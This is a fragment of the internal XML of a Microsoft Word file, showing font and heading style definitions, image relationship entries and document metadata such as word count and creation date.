      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:link w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="32"/>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10.jpg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jp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30.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4.jp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7.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40.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jp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30.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40.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662</Words>
  <Characters>3779</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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24202</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>123</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-13T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-13T11:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>